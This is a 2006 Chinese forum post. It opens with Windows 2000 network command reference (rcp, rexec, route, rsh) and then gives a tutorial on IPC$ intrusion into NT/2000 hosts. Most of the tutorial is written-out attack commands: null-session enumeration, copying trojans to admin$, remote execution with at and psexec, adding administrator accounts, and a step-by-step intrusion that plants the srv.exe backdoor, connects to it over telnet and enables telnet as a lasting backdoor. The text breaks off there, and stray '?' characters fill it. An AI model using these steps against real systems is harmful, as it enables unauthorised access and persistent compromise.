------------------------------------------ ? ? ? ? ? ? Rcp 在 Windows 2000 計算機和運行遠程外殼端口監控程序 rshd 的系統之間復制 ? ? ? ? ? ? 件。rcp 命令是一個連接命令，從 Windows 2000 計算機發出該命令時，也可以 ? ? ? ? ? ? 用于其他傳輸在兩臺運行 rshd 的計算機之間復制文件。rshd 端口監控程序可以 ? ? ? ? ? ? 在 UNIX 計算機上使用，而在 Windows 2000 上不能使用，所以 Windows 2000 ? ? ? ? ? ? 計算機僅可以作為發出命令的系統參與。遠程計算機必須也通過運行 rshd 提供 ? ? ? ? ? ? rcp 實用程序。 ? ? ? ? ? ? rcp [-a │ -b] [-h] [-r] source1 source2 ... sourceN destination ? ? ? ? ? ? 參數 ? ? ? ? ? ? -a 指定 ASCII 傳輸模式。此模式在傳出文件上將回車/換行符轉換為回車符，在傳 ? ? ? ? ? ? 入文件中將換行符轉換為回車/換行符。該模式為默認的傳輸模式。 -b 指定二進制圖像傳輸模式。沒有執行回車/換行符轉換。 ? ? ? ? ? ? -h 傳輸 Windows 2000 計算機上標記為隱藏屬性的源文件。如果沒有該選項，在 ? ? ? ? ? ? rcp 命令行上指定隱藏文件的效果與文件不存在一樣。 ? ? ? ? ? ? -r 將源的所有子目錄內容遞歸復制到目標。source 和 destination 都必須是目 ? ? ? ? ? ? 錄，雖然即使源不是目錄，使用 -r 也能夠工作。但將沒有遞歸。 ? ? ? ? ? ? source 和 destination ? ? ? ? ? ? 格式必須為 [computer[.user]:]filename。如果忽略了 [computer[.user]:] ? ? ? ? ? ? 部分，計算機將假定為本地計算機。如果省略了 [.user] 部分，將使用當前登錄的 Windows 2000 ? ? ? ? ? ? 用戶名。如果使用了完全合格的計算機名，其中包含句點 (.) 分隔符，則必須包含 ? ? ? ? ? ? [.user]。否則，計算機名的最后部分將解釋為用戶名。如果指定了多個源文件，則 destination 必須是目錄。 ? ? ? ? ? ? 如果文件名不是以 UNIX 的正斜杠 (/) 或 Windows 2000 系統的反斜杠 (\) ? ? ? ? ? ? 打頭，則假定相對于當前的工作目錄。在 Windows 2000 ? ? ? ? ? ? 中，這是發出命令的目錄。在遠程系統中，這是遠程用戶的登錄目錄。句點 (.) 表示當前的目錄。在遠程路徑中使用轉義字符（\、" ? ? ? ? ? ? 或 ＇），以便在遠程計算機中使用通配符。 ? ? ? ? ? ? ------------------------------------------- ? ? ? ? ? ? Rexec 在運行 REXEC 服務的遠程計算機上運行命令。rexec 命令在執行指定命令前，驗 ? ? ? ? ? ? 證遠程計算機上的用戶名，只有安裝了 TCP/IP 協議后才可以使用該命令。 ? ? ? ? ? ? rexec computer [-l username] [-n] command ? ? ? ? ? ? 參數 ? ? ? ? ? ? computer 指定要運行 command 的遠程計算機。 ? ? ? ? ? ? -l username 指定遠程計算機上的用戶名。 ? ? ? ? ? ? -n 將 rexec 的輸入重定向到 NULL。 ? ? ? ? ? ? command 指定要運行的命令。 ? ? ? ? ? ? -------------------------------------------- ? ? ? ? ? ? Route 控制網絡路由表。該命令只有在安裝了 TCP/IP 協議后才可以使用。 ? ? ? ? ? ? route [-f] [-p] [command [destination] [mask subnetmask] ? ? ? ? ? ? [gateway] [metric costmetric]] ? ? ? ? ? ? 參數 ? ? ? ? ? ? -f 清除所有網關入口的路由表。如果該參數與某個命令組合使用，路由表將在運行 ? ? ? ? ? ? 命令前清除。 ? ? ? ? ? ? -p 該參數與 add 命令一起使用時，將使路由在系統引導程序之間持久存在。默認 ? ? ? ? ? ? 情況下，系統重新啟動時不保留路由。與 print 命令一起使用時，顯示已注冊 ? ? ? ? ? ? 的持久路由列表。忽略其他所有總是影響相應持久路由的命令。 ? ? ? ? ? ? command 指定下列的一個命令。 ? ? ? ? ? ? 命令目的 print 打印路由 ? ? ? ? ? ? add 添加路由 ? ? ? ? ? ? delete 刪除路由 ? ? ? ? ? ? change 更改現存路由 ? ? ? ? ? ? destination 指定發送 command 的計算機。 mask subnetmask ? ? ? ? ? ? 指定與該路由條目關聯的子網掩碼。如果沒有指定，將使用 ? ? ? ? ? ? 255.255.255.255。 ? ? ? ? ? ? gateway 指定網關。 ? ? ? ? ? ? 名為 Networks 的網絡數據庫文件和名為 Hosts 的計算機名數據庫文件中均引用全部 destination 或 ? ? ? ? ? ? gateway 使用的符號名稱。如果命令是 print 或 delete，目標和網關還可以使用通配符，也可以省略網關參數。 ? ? ? ? ? ? metric costmetric 指派整數躍點數（從 1 到 9999）在計算最快速、最可*和（或）最便宜的 ? ? ? ? ? ? 路由時使用。 ? ? ? ? ? ? --------------------------------------------------------------------------------- ? ? ? ? ? ? Rsh ? ? ? ? ? ? 在運行 RSH 服務的遠程計算機上運行命令。該命令只有在安裝了 TCP/IP 協議后才可以使用。 ? ? ? ? ? ? rsh computer [-l username] [-n] command ? ? ? ? ? ? 參數 ? ? ? ? ? ? computer 指定運行 command 的遠程計算機。 ? ? ? ? ? ? -l username 指定遠程計算機上使用的用戶名。如果省略，則使用登錄的用戶名。 ? ? ? ? ? ? -n 將 rsh 的輸入重定向到 NULL。 ? ? ? ? ? ? command 指定要運行的命令。 ? ? ? ? ? ? _________________________________________________________________________________ ? ? ? ? ? ? Tftp 將文件傳輸到正在運行 TFTP 服務的遠程計算機或從正在運行 TFTP 服務的遠 ? ? ? ? ? ? 程計算機傳輸文件。該命令只有在安 ? ? ? ? ? ? ipc$命令 ? ? ? ? ? ? 一 摘要 ? ? ? ? ? ? 二 什么是ipc$ ? ? ? ? ? ? 三 什么是空會話 ? ? ? ? ? ? 四 空會話可以做什么 ? ? ? ? ? ? 五 ipc$所使用的端口 ? ? ? ? ? ? 六 ipc管道在hack攻擊中的意義 ? ? ? ? ? ? 七 ipc$連接失敗的常見原因 ? ? ? ? ? ? 八 復制文件失敗的原因 ? ? ? ? ? ? 九 關于at命令和xp對ipc$的限制 ? ? ? ? ? ? 十 如何打開目標的IPC$共享以及其他共享 ? ? ? ? ? ? 十一 一些需要shell才能完成的命令 ? ? ? ? ? ? 十二 入侵中可能會用到的命令 ? ? ? ? ? ? 十三 對比過去和現今的ipc$入侵 ? ? ? ? ? ? 十四 如何防范ipc$入侵 ? ? ? ? ? ? 十五 ipc$入侵問答精選 ? ? [1 樓] | Posted: 2006-05-23 08:10

?

?

? ? ? ? ? ? 注意：本文所討論的各種情況均默認發生在win NT/2000環境下，win98將不在此次討論之列。 ? ? ? ? ? ? 二 什么是ipc$ ? ? ? ? ? ? IPC$(Internet Process ? ? ? ? ? ? Connection)是共享"命名管道"的資源，它是為了讓進程間通信而開放的命名管道，通過提供可信任的用戶名和口令，連接雙方可以建立安全的通道并以此通道進行加密數據的交換，從而實現對遠程計算機的訪問。IPC$是NT/2000的一項新功能，它有一個特點，即在同一時間內，兩個IP之間只允許建立一個連接。NT/2000在提供了ipc$功能的同時，在初次安裝系統時還打開了默認共享，即所有的邏輯共享(c$,d$,e$……)和系統目錄winnt或windows(admin$)共享。所有的這些，微軟的初衷都是為了方便管理員的管理，但在有意無意中，導致了系統安全性的降低。 ? ? ? ? ? ? 平時我們總能聽到有人在說ipc$漏洞，ipc$漏洞，其實ipc$并不是一個真正意義上的漏洞,我想之所以有人這么說，一定是指微軟自己安置的那個‘后門’：空會話（Null ? ? ? ? ? ? session）。那么什么是空會話呢？ ? ? ? ? ? ? 三 什么是空會話 ? ? ? ? ? ? 在介紹空會話之前，我們有必要了解一下一個安全會話是如何建立的。 ? ? ? ? ? ? 在Windows NT ? ? ? ? ? ? 4.0中是使用挑戰響應協議與遠程機器建立一個會話的，建立成功的會話將成為一個安全隧道，建立雙方通過它互通信息，這個過程的大致順序如下： ? ? ? ? ? ? 1）會話請求者（客戶）向會話接收者（服務器）傳送一個數據包，請求安全隧道的建 ? ? ? ? ? ? 立； ? ? ? ? ? ? 2）服務器產生一個隨機的64位數（實現挑戰）傳送回客戶； ? ? ? ? ? ? 3）客戶取得這個由服務器產生的64位數，用試圖建立會話的帳號的口令打亂它，將結 ? ? ? ? ? ? 果返回到服務器（實現響應）； ? ? ? ? ? ? 4）服務器接受響應后發送給本地安全驗證（LSA），LSA通過使用該用戶正確的口令來核實響應以便確認請求者身份。如果請求者的帳號是服務器的本地帳號，核實本地發生；如果請求的帳號是一個域的帳號，響應傳送到域控制器去核實。當對挑戰的響應核實為正確后，一個訪問令牌產生，然后傳送給客戶。客戶使用這個訪問令牌連接到服務器上的資源直到建議的會話被終止。 ? ? ? ? ? ? 以上是一個安全會話建立的大致過程，那么空會話又如何呢？ ? ? ? ? ? ? 空會話是在沒有信任的情況下與服務器建立的會話（即未提供用戶名與密碼），但根據WIN2000的訪問控制模型，空會話的建立同樣需要提供一個令牌，可是空會話在建立過程中并沒有經過用戶信息的認證，所以這個令牌中不包含用戶信息，因此，這個會話不能讓系統間發送加密信息，但這并不表示空會話的令牌中不包含安全標識符SID（它標識了用戶和所屬組），對于一個空會話，LSA提供的令牌的SID是S-1-5-7，這就是空會話的SID，用戶名是：ANONYMOUS ? ? ? ? ? ? LOGON（這個用戶名是可以在用戶列表中看到的，但是是不能在SAM數據庫中找到，屬于系統內置的帳號），這個訪問令牌包含下面偽裝的組： ? ? ? ? ? ? Everyone ? ? ? ? ? ? Network ? ? ? ? ? ? 在安全策略的限制下，這個空會話將被授權訪問到上面兩個組有權訪問到的一切信息。那么建立空會話到底可以作什么呢？ ? ? ? ? ? ? 四 空會話可以做什么 ? ? ? ? ? ? 對于NT，在默認安全設置下，借助空連接可以列舉目標主機上的用戶和共享，訪問everyone權限的共享，訪問小部分注冊表等，并沒有什么太大的利用價值；對2000作用更小，因為在Windows ? ? ? ? ? ? 2000 和以后版本中默認只有管理員和備份操作員有權從網絡訪問到注冊表，而且實現起來也不方便，需借助工具。 ? ? ? ? ? ? 從這些我們可以看到，這種非信任會話并沒有多大的用處，但從一次完整的ipc$入侵來看，空會話是一個不可缺少的跳板，因為我們從它那里可以得到戶列表，而大多數弱口令掃描工具就是利用這個用戶列表來進行口令猜解的，成功的導出用戶列表大大增加了猜解的成功率，僅從這一點，足以說明空會話所帶來的安全隱患，因此說空會話毫無用處的說法是不正確的。以下是空會話中能夠使用的一些具體命令： ? ? ? ? ? ? 1 首先，我們先建立一個空連接（當然，這需要目標開放ipc$） ? ? ? ? ? ? 命令：net use \\ip\ipc$ "" /user:"" ? ? ? ? ? ? 注意：上面的命令包括四個空格，net與use中間有一個空格，use后面一個，密碼左右各一個空格。 ? ? ? ? ? ? 2 查看遠程主機的共享資源 ? ? ? ? ? ? 命令：net view \\ip ? ? ? ? ? ? 解釋：前提是建立了空連接后，用此命令可以查看遠程主機的共享資源，如果它開了共享，可以得到如下面的結果，但此命令不能顯示默認共享。 ? ? ? ? ? ? 在 \\*.*.*.*的共享資源 ? ? ? ? ? ? 資源共享名 類型 用途 注釋 ? ? ? ? ? ? ----------------------------------------------------------- ? ? ? ? ? ? NETLOGON Disk Logon server share ? ? ? ? ? ? SYSVOL Disk Logon server share ? ? ? ? ? ? 命令成功完成。 ? ? ? ? ? ? 3 查看遠程主機的當前時間 ? ? ? ? ? ? 命令： net time \\ip ? ? ? ? ? ? 解釋：用此命令可以得到一個遠程主機的當前時間。 ? ? ? ? ? ? 4 得到遠程主機的NetBIOS用戶名列表（需要打開自己的NBT） ? ? ? ? ? ? 命令：nbtstat -A ip ? ? ? ? ? ? 用此命令可以得到一個遠程主機的NetBIOS用戶名列表，返回如下結果： ? ? ? ? ? ? Node IpAddress: [*.*.*.*] Scope Id: [] ? ? ? ? ? ? NetBIOS Remote Machine Name Table ? ? ? ? ? ? Name Type Status ? ? ? ? ? ? --------------------------------------------- ? ? ? ? ? ? SERVER <00> UNIQUE Registered ? ? ? ? ? ? OYAMANISHI-H <00> GROUP Registered ? ? ? ? ? ? OYAMANISHI-H <1C> GROUP Registered ? ? ? ? ? ? SERVER <20> UNIQUE Registered ? ? ? ? ? ? OYAMANISHI-H <1B> UNIQUE Registered ? ? ? ? ? ? OYAMANISHI-H <1E> GROUP Registered ? ? ? ? ? ? SERVER <03> UNIQUE Registered ? ? ? ? ? ? OYAMANISHI-H <1D> UNIQUE Registered ? ? ? ? ? ? ..__MSBROWSE__.<01> GROUP Registered ? ? ? ? ? ? INet~Services <1C> GROUP Registered ? ? ? ? ? ? IS~SERVER......<00> UNIQUE Registered ? ? ? ? ? ? MAC Address = 00-50-8B-9A-2D-37 ? ? ? ? ? ? 以上就是我們經常使用空會話做的事情，好像也能獲得不少東西喲，不過要注意一點：建立IPC$連接的操作會在Event ? ? ? ? ? ? Log中留下記錄，不管你是否登錄成功。 好了，那么下面我們就來看看ipc$所使用的端口是什么？ ? ? ? ? ? ? 五 ipc$所使用的端口 ? ? ? ? ? ? 首先我們來了解一些基礎知識： ? ? ? ? ? ? 1 SMB:(Server Message Block) Windows協議族，用于文件打印共享的服務； ? ? ? ? ? ? 2 NBT:(NETBios Over ? ? ? ? ? ? TCP/IP)使用137（UDP）138（UDP）139（TCP）端口實現基于TCP/IP協議的NETBIOS網絡互聯。 ? ? ? ? ? ? 3 ? ? ? ? ? ? 在WindowsNT中SMB基于NBT實現，即使用139（TCP）端口；而在Windows2000中，SMB除了基于NBT實現，還可以直接通過445端口實現。 ? ? ? ? ? ? 有了這些基礎知識，我們就可以進一步來討論訪問網絡共享對端口的選擇了： ? ? ? ? ? ? 對于win2000客戶端（發起端）來說： ? ? ? ? ? ? 1 ? ? ? ? ? ? 如果在允許NBT的情況下連接服務器時，客戶端會同時嘗試訪問139和445端口，如果445端口有響應，那么就發送RST包給139端口斷開連接，用455端口進行會話，當445端口無響應時，才使用139端口，如果兩個端口都沒有響應，則會話失敗； ? ? ? ? ? ? 2 如果在禁止NBT的情況下連接服務器時，那么客戶端只會嘗試訪問445端口，如果445端口無響應，那么會話失敗。 ? ? ? ? ? ? 對于win2000服務器端來說： ? ? ? ? ? ? 1 如果允許NBT, 那么UDP端口137, 138, TCP 端口 139, 445將開放（LISTENING）； ? ? ? ? ? ? 2 如果禁止NBT，那么只有445端口開放。 ? ? ? ? ? ? 我們建立的ipc$會話對端口的選擇同樣遵守以上原則。顯而易見，如果遠程服務器沒有監聽139或445端口，ipc$會話是無法建立的。 ? ? ? ? ? ? 六 ipc管道在hack攻擊中的意義 ? ? ? ? ? ? ipc管道本來是微軟為了方便管理員進行遠程管理而設計的，但在入侵者看來，開放ipc管道的主機似乎更容易得手。通過ipc管道，我們可以遠程調用一些系統函數（大多通過工具實現，但需要相應的權限），這往往是入侵成敗的關鍵。如果不考慮這些，僅從傳送文件這一方面，ipc管道已經給了入侵者莫大的支持，甚至已經成為了最重要的傳輸手段，因此你總能在各大論壇上看到一些朋友因為打不開目標機器的ipc管道而一籌莫展大呼救命。當然，我們也不能忽視權限在ipc管道中扮演的重要角色，想必你一定品嘗過空會話的尷尬，沒有權限，開啟管道我們也無可奈何。但入侵者一旦獲得了管理員的權限，那么ipc管道這把雙刃劍將顯示出它猙獰的一面。 ? ? [2 樓] | Posted: 2006-05-23 08:12

?

?

? ? ? ? ? ? 以下是一些常見的導致ipc$連接失敗的原因： ? ? ? ? ? ? 1 IPC連接是Windows NT及以上系統中特有的功能，由于其需要用到Windows ? ? ? ? ? ? NT中很多DLL函數，所以不能在Windows ? ? ? ? ? ? 9.x/Me系統中運行，也就是說只有nt/2000/xp才可以相互建立ipc$連接，98/me是不能建立ipc$連接的； ? ? ? ? ? ? 2 ? ? ? ? ? ? 如果想成功的建立一個ipc$連接，就需要響應方開啟ipc$共享，即使是空連接也是這樣，如果響應方關閉了ipc$共享，將不能建立連接； ? ? ? ? ? ? 3 ? ? ? ? ? ? 連接發起方未啟動Lanmanworkstation服務（顯示名為：Workstation）：它提供網絡鏈結和通訊，沒有它發起方無法發起連接請求； ? ? ? ? ? ? 4 響應方未啟動Lanmanserver服務（顯示名為：Server）：它提供了 RPC ? ? ? ? ? ? 支持、文件、打印以及命名管道共享，ipc$依賴于此服務，沒有它主機將無法響應發起方的連接請求，不過沒有它仍可發起ipc$連接； ? ? ? ? ? ? 5 響應方未啟動NetLogon，它支持網絡上計算機 pass-through 帳戶登錄身份（不過這種情況好像不多）； ? ? ? ? ? ? 6 響應方的139，445端口未處于監聽狀態或被防火墻屏蔽； ? ? ? ? ? ? 7 連接發起方未打開139，445端口； ? ? ? ? ? ? 8 用戶名或者密碼錯誤：如果發生這樣的錯誤，系統將給你類似于＇無法更新密碼＇這樣的錯誤提示（顯然空會話排除這種錯誤）； ? ? ? ? ? ? 9 ? ? ? ? ? ? 命令輸入錯誤：可能多了或少了空格，當用戶名和密碼中不包含空格時兩邊的雙引號可以省略，如果密碼為空，可以直接輸入兩個引號""即可； ? ? ? ? ? ? 10 如果在已經建立好連接的情況下對方重啟計算機，那么ipc$連接將會自動斷開，需要重新建立連接。 ? ? ? ? ? ? 另外,你也可以根據返回的錯誤號分析原因： ? ? ? ? ? ? 錯誤號5，拒絕訪問：很可能你使用的用戶不是管理員權限的； ? ? ? ? ? ? 錯誤號51，Windows無法找到網絡路徑：網絡有問題； ? ? ? ? ? ? 錯誤號53，找不到網絡路徑：ip地址錯誤；目標未開機；目標lanmanserver服務未啟動；目標有防火墻（端口過濾）； ? ? ? ? ? ? 錯誤號67，找不到網絡名：你的lanmanworkstation服務未啟動或者目標刪除了ipc$； ? ? ? ? ? ? 錯誤號1219，提供的憑據與已存在的憑據集沖突：你已經和對方建立了一個ipc$，請刪除再連； ? ? ? ? ? ? 錯誤號1326，未知的用戶名或錯誤密碼：原因很明顯了； ? ? ? ? ? ? 錯誤號1792，試圖登錄，但是網絡登錄服務沒有啟動：目標NetLogon服務未啟動； ? ? ? ? ? ? 錯誤號2242，此用戶的密碼已經過期：目標有帳號策略，強制定期要求更改密碼。 ? ? ? ? ? ? 八 復制文件失敗的原因 ? ? ? ? ? ? 有些朋友雖然成功的建立了ipc$連接，但在copy時卻遇到了這樣那樣的麻煩，無法復制成功，那么導致復制失敗的常見原因又有哪些呢？ ? ? ? ? ? ? 1 對方未開啟共享文件夾 ? ? ? ? ? ? 這類錯誤出現的最多，占到50%以上。許多朋友在ipc$連接建立成功后，甚至都不知道對方是否有共享文件夾，就進行盲目復制，結果導致復制失敗而且郁悶的很。因此我建議大家在進行復制之前務必用net ? ? ? ? ? ? view ? ? ? ? ? ? \\IP這個命令看一下你想要復制的共享文件夾是否存在（用軟件查看當然更好），不要認為能建立ipc$連接就一定有共享文件夾存在。 ? ? ? ? ? ? 2 向默認共享復制失敗 ? ? ? ? ? ? 這類錯誤也是大家經常犯的，主要有兩個小方面： ? ? ? ? ? ? 1）錯誤的認為能建立ipc$連接的主機就一定開啟了默認共享，因而在建立完連接之后馬上向c$,d$,admin$之類的默認共享復制文件，一旦對方未開啟默認共享，將導致復制失敗。ipc$連接成功只能說明對方打開了ipc$共享，并不能說明默認共享一定存在。ipc$共享與默認共享是兩碼事，ipc$共享是一個命名管道，并不是哪個實際的文件夾，而默認共享卻是實實在在的共享文件夾； ? ? ? ? ? ? 2）由于net view \\IP ? ? ? ? ? ? 這個命令無法顯示默認共享文件夾（因為默認共享帶$），因此通過這個命令，我們并不能判斷對方是否開啟了默認共享，因此如果對方未開啟默認共享，那么所有向默認共享進行的操作都不能成功；（不過大部分掃描軟件在掃弱口令的同時，都能掃到默認共享目錄，可以避免此類錯誤的發生） ? ? ? ? ? ? 要點：請大家一定區分ipc共享，默認共享，普通共享這三者的區別：ipc共享是一個管道，并不是實際的共享文件夾；默認共享是安裝時默認打開的文件夾；普通共享是我們自己開啟的可以設置權限的共享文件夾。 ? ? ? ? ? ? 3用戶權限不夠，包括四種情形： ? ? ? ? ? ? 1）空連接向所有共享（默認共享和普通共享）復制時，權限是不夠的； ? ? ? ? ? ? 2）向默認共享復制時，在Win2000 Pro版中，只有Administrators和Backup ? ? ? ? ? ? Operators組成員才可以，在Win2000 Server版本 Server ? ? ? ? ? ? Operatros組也可以訪問到這些共享目錄； ? ? ? ? ? ? 3）向普通共享復制時，要具有相應權限（即對方管理員事先設定的訪問權限）； ? ? ? ? ? ? 4）對方可以通過防火墻或安全軟件的設置，禁止外部訪問共享； ? ? ? ? ? ? 注意： ? ? ? ? ? ? 1 不要認為administrator就一定具有管理員權限，管理員名稱是可以改的 ? ? ? ? ? ? 2 ? ? ? ? ? ? 管理員可以訪問默認共享的文件夾，但不一定能夠訪問普通的共享文件夾，因為管理員可以對普通的共享文件夾進行訪問權限設置，如圖6，管理員為D盤設置的訪問權限為僅允許名為xinxin的用戶對該文件夾進行完全訪問，那么此時即使你擁有管理員權限，你仍然不能訪問D盤。不過有意思的是，如果此時對方又開啟了D$的默認共享，那么你卻可以訪問D$，從而繞過了權限限制，有興趣的朋友可以自己做測試。 ? ? ? ? ? ? 4被防火墻殺死或在局域網 ? ? ? ? ? ? 還有一種情況，那就是也許你的復制操作已經成功，但當遠程運行時，被防火墻殺掉了，導致找不到文件；或者你把木馬復制到了局域網內的主機，導致連接失敗（反向連接的木馬不會發生這種情況）。如果你沒有想到這種情況，你會以為是復制上出了問題，但實際你的復制操作已經成功了，只是運行時出了問題。 ? ? ? ? ? ? 呵呵，大家也知道，ipc$連接在實際操作過程中會出現各種各樣的問題，上面我所總結的只是一些常見錯誤，沒說到的，大家可以給我提個醒兒。 ? ? ? ? ? ? 九 關于at命令和xp對ipc$的限制 ? ? ? ? ? ? 本來還想說一下用at遠程運行程序失敗的原因，但考慮到at的成功率不是很高，問題也很多，在這里就不提它了（提的越多，用的人就越多），而是推薦大家用p***ec.exe遠程運行程序，假設想要遠程機器執行本地c:\xinxin.exe文件，且管理員為administrator，密碼為1234，那么輸入下面的命令： ? ? ? ? ? ? p***ec \\ip -u administrator -p 1234 -c c:\xinxin.exe ? ? ? ? ? ? 如果已經建立ipc連接，則-u -p這兩個參數不需要，p***ec.exe將自動拷貝文件到遠程機器并運行。 ? ? ? ? ? ? 本來xp中的ipc$也不想在這里討論，想單獨拿出來討論，但看到越來越多的朋友很急切的提問為什么遇到xp的時候，大部分操作都很難成功。我在這里就簡單提一下吧，在xp的默認安全選項中，任何遠程訪問僅被賦予來賓權限，也就是說即使你是用管理員帳戶和密碼，你所得到的權限也只是Guest，因此大部分操作都會因為權限不夠而失敗，而且到目前為止并沒有一個好的辦法來突破這一限制。所以如果你真的得到了xp的管理員密碼，我建議你盡量避開ipc管道。 ? ? ? ? ? ? 十 如何打開目標的IPC$共享以及其他共享 ? ? ? ? ? ? 目標的ipc$不是輕易就能打開的，否則就要天下打亂了。你需要一個admin權限的shell，比如telnet，木馬，cmd重定向等，然后在shell下執行： ? ? ? ? ? ? net share ipc$ ? ? ? ? ? ? 開放目標的ipc$共享； ? ? ? ? ? ? net share ipc$ /del ? ? ? ? ? ? 關閉目標的ipc$共享；如果你要給它開共享文件夾，你可以用： ? ? ? ? ? ? net share ? ? ? ? ? ? xinxin=c:這樣就把它的c盤開為共享名為xinxin共享文件夾了。（可是我發現很多人錯誤的認為開共享文件夾的命令是net ? ? ? ? ? ? share c$，還大模大樣的給菜鳥指指點點，真是誤人子弟了）。再次聲明，這些操作都是在shell下才能實現的。 ? ? ? ? ? ? 十一 一些需要shell才能完成的命令 ? ? ? ? ? ? 看到很多教程這方面寫的十分不準確，一些需要shell才能完成命令就簡簡單單的在ipc$連接下執行了，起了誤導作用。那么下面我總結一下需要在shell才能完成的命令： ? ? ? ? ? ? 1 向遠程主機建立用戶，激活用戶，修改用戶密碼，加入管理組的操作需要在shell下完成； ? ? ? ? ? ? 2 打開遠程主機的ipc$共享，默認共享，普通共享的操作需要在shell下完成； ? ? ? ? ? ? 3 運行/關閉遠程主機的服務，需要在shell下完成； ? ? ? ? ? ? 4 啟動/殺掉遠程主機的進程，也需要在shell下完成（用軟件的情況下除外，如pskill）。 ? ? ? ? ? ? 十二 入侵中可能會用到的命令 ? ? ? ? ? ? 為了這份教程的完整性，我列出了ipc$入侵中的一些常用命令，如果你已經掌握了這些命令，你可以跳過這一部分看下面的內容。請注意這些命令是適用于本地還是遠程，如果只適用于本地，你只能在獲得遠程主機的shell（如cmd，telnet等）后，才能向遠程主機執行。 ? ? ? ? ? ? 1 建立/刪除ipc$連接的命令 ? ? ? ? ? ? 1）建立空連接: ? ? ? ? ? ? net use \\127.0.0.1\ipc$ "" /user:"" ? ? ? ? ? ? 2）建立非空連接: ? ? ? ? ? ? net use \\127.0.0.1\ipc$ "密碼" /user:"用戶名" ? ? ? ? ? ? 3）刪除連接: ? ? ? ? ? ? net use \\127.0.0.1\ipc$ /del ? ? ? ? ? ? 2 在ipc$連接中對遠程主機的操作命令 ? ? ? ? ? ? 1） 查看遠程主機的共享資源（看不到默認共享）: ? ? ? ? ? ? net view \\127.0.0.1 ? ? ? ? ? ? 2） 查看遠程主機的當前時間: ? ? ? ? ? ? net time \\127.0.0.1 ? ? ? ? ? ? 3） 得到遠程主機的netbios用戶名列表: ? ? ? ? ? ? nbtstat -A 127.0.0.1 ? ? ? ? ? ? 4）映射/刪除遠程共享: ? ? ? ? ? ? net use z: \\127.0.0.1\c ? ? ? ? ? ? 此命令將共享名為c的共享資源映射為本地z盤 ? ? ? ? ? ? net use z: /del ? ? ? ? ? ? 刪除映射的z盤，其他盤類推 ? ? ? ? ? ? 5）向遠程主機復制文件: ? ? ? ? ? ? copy 路徑\文件名 \\IP\共享目錄名，如： ? ? ? ? ? ? copy c:\xinxin.exe \\127.0.0.1\c$ 即將c盤下的xinxin.exe復制到對方c盤內 ? ? ? ? ? ? 當然，你也可以把遠程主機上的文件復制到自己的機器里： ? ? ? ? ? ? copy \\127.0.0.1\c$\xinxin.exe c: ? ? ? ? ? ? 6）遠程添加計劃任務: ? ? ? ? ? ? at \\IP 時間 程序名 如： ? ? ? ? ? ? at \\127.0.0.0 11:00 xinxin.exe ? ? ? ? ? ? 注意：時間盡量使用24小時制；如果你打算運行的程序在系統默認搜索路徑（比如system32/）下則不用加路徑，否則必須加全路徑 ? ? ? ? ? ? 3 本地命令 ? ? ? ? ? ? 1）查看本地主機的共享資源（可以看到本地的默認共享） ? ? ? ? ? ? net share ? ? ? ? ? ? 2）得到本地主機的用戶列表 ? ? ? ? ? ? net user ? ? ? ? ? ? 3）顯示本地某用戶的帳戶信息 ? ? ? ? ? ? net user 帳戶名 ? ? ? ? ? ? 4）顯示本地主機當前啟動的服務 ? ? ? ? ? ? net start ? ? ? ? ? ? 5）啟動/關閉本地服務 ? ? ? ? ? ? net start 服務名 ? ? ? ? ? ? net stop 服務名 ? ? ? ? ? ? 6）在本地添加帳戶 ? ? ? ? ? ? net user 帳戶名 密碼 /add ? ? ? ? ? ? 7）激活禁用的用戶 ? ? ? ? ? ? net uesr 帳戶名 /active:yes ? ? ? ? ? ? 8）加入管理員組 ? ? ? ? ? ? net localgroup administrators 帳戶名 /add ? ? ? ? ? ? 很顯然的是，雖然這些都是本地命令，但如果你在遠程主機的shell中輸入，比如你telnet成功后輸入上面這些命令，那么這些本地輸入將作用在遠程主機上。 ? ? ? ? ? ? 4 其他一些命令 ? ? ? ? ? ? 1）telnet ? ? ? ? ? ? telnet IP 端口 ? ? ? ? ? ? telnet 127.0.0.0 23 ? ? ? ? ? ? 2）用opentelnet.exe開啟遠程主機的telnet ? ? ? ? ? ? OpenTelnet.exe \\ip 管理員帳號 密碼 NTLM的認證方式 port ? ? ? ? ? ? OpenTelnet.exe \\127.0.0.1 administrator "" 1 90 ? ? ? ? ? ? 不過這個小工具需要滿足四個要求： ? ? ? ? ? ? 1）目標開啟了ipc$共享 ? ? ? ? ? ? 2）你要擁有管理員密碼和帳號 ? ? ? ? ? ? 3）目標開啟RemoteRegistry服務，用戶就可以更改ntlm認證 ? ? ? ? ? ? 4）對僅WIN2K/XP有效 ? ? ? ? ? ? 3）用p***ec.exe一步獲得shell，需要ipc管道支持 ? ? ? ? ? ? p***ec.exe \\IP -u 管理員帳號 -p 密碼 cmd ? ? ? ? ? ? p***ec.exe \\127.0.0.1 -u administrator -p "" cmd ? ? ? ? ? ? 十三 對比過去和現今的ipc$入侵 ? ? ? ? ? ? 既然是對比，那么我就先把過去的ipc$入侵步驟寫給大家，都是蠻經典的步驟： ? ? ? ? ? ? [1] ? ? ? ? ? ? C:\>net use \\127.0.0.1\ipc$ "" /user:admintitrators ? ? ? ? ? ? \\用掃到的空口令建立連接　　 ? ? ? ? ? ? [2] ? ? ? ? ? ? c:\>net view \\127.0.0.1 ? ? ? ? ? ? \\查看遠程的共享資源 ? ? ? ? ? ? [3] ? ? ? ? ? ? C:\>copy srv.exe \\127.0.0.1\admin$\system32 ? ? ? ? ? ? \\將一次性后門srv.exe復制到對方的系統文件夾下，前提是admin$開啟　　 ? ? ? ? ? ? [4] ? ? ? ? ? ? C:\>net time \\127.0.0.1 ? ? ? ? ? ? \\查看遠程主機的當前時間 ? ? ? ? ? ? [5] ? ? ? ? ? ? C:\>at \\127.0.0.1 時間 srv.exe ? ? ? ? ? ? \\用at命令遠程運行srv.exe，需要對方開啟了＇Task Scheduler＇服務　　 ? ? ? ? ? ? [6] ? ? ? ? ? ? C:\>net time \\127.0.0.1 ? ? ? ? ? ? \\再次查看當前時間來估算srv.exe是否已經運行，此步可以省略 ? ? ? ? ? ? [7]　　　　 ? ? ? ? ? ? C:\>telnet 127.0.0.1 99 ? ? ? ? ? ? \\開一個新窗口，用telnet遠程登陸到127.0.0.1從而獲得一個shell(不懂shell是什么意思？那你就把它想象成遠程機器的控制權就好了，操作像DOS)，99端口是srv.exe開的一次性后門的端口　　 ? ? ? ? ? ? [8] ? ? ? ? ? ? C:\WINNT\system32>net start telnet ? ? ? ? ? ? \\我們在剛剛登陸上的shell中啟動遠程機器的telnet服務，畢竟srv.exe是一次性的后門，我們需要一個長久的后門便于以后訪問，如果對方的telnet已經啟動，此步可省略 ? ? ? ? ? 